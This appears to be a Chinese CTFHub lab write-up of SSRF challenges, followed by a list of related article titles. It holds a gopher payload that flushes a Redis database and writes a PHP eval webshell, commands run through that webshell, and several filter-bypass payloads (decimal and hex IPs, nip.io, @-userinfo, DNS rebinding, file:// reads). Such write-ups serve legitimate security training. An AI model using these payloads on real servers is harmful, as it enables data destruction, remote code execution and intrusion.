gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522peak%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Apeak.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

返回504或如下所示不用担心,已经写入了

利用我们写入的webshell获取flag

http://challenge-ac09a2d8d337e54e.sandbox.ctfhub.com:10800/peak.php?peak=system('ls /');


http://challenge-ac09a2d8d337e54e.sandbox.ctfhub.com:10800/peak.php?peak=system('cat /flag_cd0a54e70051990d13f1fec4a08aa0f6');

URL Bypass

题目:
请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧
访问后提示:url must startwith "http://notfound.ctfhub.com"
先尝试直接访问,无返回:http://challenge-24ea375bcb0132cd.sandbox.ctfhub.com:10800/?url=http://notfound.ctfhub.com

题目是URL Bypass,那么我们考虑绕过
怎样绕过这个域名呢?有如下两种方法:
方法一

http://www.baidu.com@127.0.0.1
等于http://127.0.0.1



方法二

http://www.xxx.com.127.0.0.1.nip.io/phpinfo.php
等于127.0.0.1/phpinfo.php


Payload:

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
或
?url=http://notfound.ctfhub.com.127.0.0.1.nip.io/flag.php

数字IP Bypass

题目:
这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

解题
如题所示,我们先访问127.0.0.1,发现被ban,同时还ban掉了172、@、.

http://challenge-55916ccbe0194b1e.sandbox.ctfhub.com:10800/?url=http://127.0.0.1

那么我们要访问127.0.0.1,怎么办,有三种方法
方法一:使用数字IP
127.0.0.1的数字ip是2130706433
payload:?url=http://2130706433/flag.php

方法二:转16进制
127.0.0.1的16进制是0x7F000001
在线转换网址:https://tool.520101.com/wangluo/jinzhizhuanhuan/
payload:?url=http://0x7F000001/flag.php

302跳转 Bypass

题目:
SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

我们查看index.php源码

?url=file:///var/www/html/index.php

<?phperror_reporting(0);if (!isset($_REQUEST['url'])) {header("Location: /?url=_");exit;
}$url = $_REQUEST['url'];if (preg_match("/127|172|10|192/", $url)) {exit("hacker! Ban Intranet IP");
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

flag.php源码:

?url=file:///var/www/html/flag.php

<?phperror_reporting(0);if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {echo "Just View From 127.0.0.1";exit;
}echo getenv("CTFHUB");

payload:?url=http://localhost/flag.php

DNS重绑定 Bypass

题目:
关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助
解题
使用file://协议查看inde.php和flag.php源码
index.php

<?phperror_reporting(0);if (!isset($_REQUEST['url'])) {header("Location: /?url=_");exit;
}$url = $_REQUEST['url'];if (preg_match("/127|172|10|192/", $url)) {exit("hacker! Ban Intranet IP");
}$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);

flag.php

<?phperror_reporting(0);if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {echo "Just View From 127.0.0.1";exit;
}echo getenv("CTFHUB");

由上可见,过滤了127、172、10、192
网址:https://lock.cmpxchg8b.com/rebinder.html

payload:

?url=7f000001.7f000002.rbndr.us/flag.php
或
?url=qk8zsr.dnslog.cn/flag.php

CTFHub-SSRF(全部)相关推荐

  1. CTFHub SSRF总结

    CTFHub上的SSRF技能树主要分为三部分: http.dict和file等协议的利用 gopher协议的利用 Bypass 如图所示,依次对应完全三叉树的三颗子树: 笔者对该靶场所需的相关知识进行 ...

  2. SSRF - ctfhub -2【FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定Bypass】

    FastCGI协议 知识参考:CTFhub官方链接 首先介绍一下原理(这里简单介绍,详情请看官方附件) 如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协 ...

  3. CTFHub技能树 Web-SSRF 302跳转 Bypass

    CTFHub技能树 Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.p ...

  4. SSRF漏洞之常见Bypass篇

    SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本 ...

  5. 从一文中了解SSRF的各种绕过姿势及攻击思路

    文章目录 声明 前言 漏洞相关信息 漏洞成因 漏洞定义 漏洞危害 所涉函数 curl_exec() file_get_contents() fsockopen() 所涉协议 file伪协议 Gophe ...

  6. 漏洞原理——ssrf

    一.什么是SSRF 1.简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的 ...

  7. CTFHUB技能树(全详细解析含进阶)

    CTFHUB技能树 HTTP协议 请求树 302跳转 Cookie 基础认证 响应包源代码 信息泄露 目录遍历 phpinfo 备份文件下载 网站源码 bak文件 vim缓存 .DS_Store Gi ...

  8. CTFHUB技能树之Web

    web web前置技能 参考链接 -操作系统 -数据库 -HTML/CSS -程序语言 HTTP协议 0x01 请求方式 1)HTTP Method 是可以自定义的,并且区分大小写 可以通过抓包更改其 ...

  9. ctfhub技能书+历年真题学习笔记(详解)

    Web Web前置技能 HTTP协议 请求方式 题目:HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you ...

  10. SSRF漏洞详解(练习持续更新中)

    概念 SSRF(Sever-Side Request Forgery: 服务器端请求伪造) 是一种由攻击者构造由服务器端发起请求的安全漏洞.一般情况下,SSRF漏洞攻击的目标是从外网无法访问的内网系统 ...

最新文章

  1. 《高效团队开发工具与方法》
  2. js 判断 是否为android
  3. WPF MultiSelect模式下ListBox 实现多个ListBoxItem拖拽
  4. leetcode 450. 删除二叉搜索树中的节点 c语言实现
  5. C++Primer:函数(参数传递:引用形参)
  6. 数据结构和算法(05)---链表(c++)
  7. springcloud注册demo(使⽤第⼀代Spring Cloud核⼼组件完成项⽬构建、编码及测试)
  8. es6 循环加载ES6模块
  9. java中获取路径_java中获取路径的几种基本的方法
  10. 在职工象棋赛上弃子拿下一盘
  11. python vector变量_用Python实现因子分析
  12. 命令行运行 Java 报 java.lang.NoClassDefFoundError
  13. 华为手机bootloader上锁回锁教程及ADB工具下载——精华帖
  14. 淘系双十一全链路压测流程概览
  15. 2020移动apn接入点哪个快_设置APN教程
  16. 404报错:The origin server did not find a current representation for the target resource解决的两种办法
  17. OBS直播时编码器、码率控制器、分辨率帧率是什么以及如何向第三方推流
  18. java怎么把数据返回给客户端_java 服务器怎样给客户端传输数据
  19. 163邮箱哪个安全好用?常用的电子邮箱品牌有哪些?
  20. 怎么把aac转mp3格式?这几种转换方式建议学习一下

热门文章

  1. Intel AMT RDK SDK SCS的概念介绍。
  2. Adobe Flash Player安装遇上错误:未能初始化的解决方法
  3. Spring面试题(一)
  4. 1KB到底有多大?(为什么买回来的硬盘总比标称容量小)
  5. 某页式虚拟存储器,若某用户空间为16个界面,页面大小为1KB,现有页表如下,逻辑地址0A2CH所对应的物理地址为
  6. button type属性
  7. 美国证监会暂停香港设立的区块链公司的股票交易
  8. ZDNS助力中国科技网启动RPKI路由验证,我国进入IP地址路由安全认证时代
  9. 留学Essay写作方法从哪里学习?
  10. 微分流形(流形)定义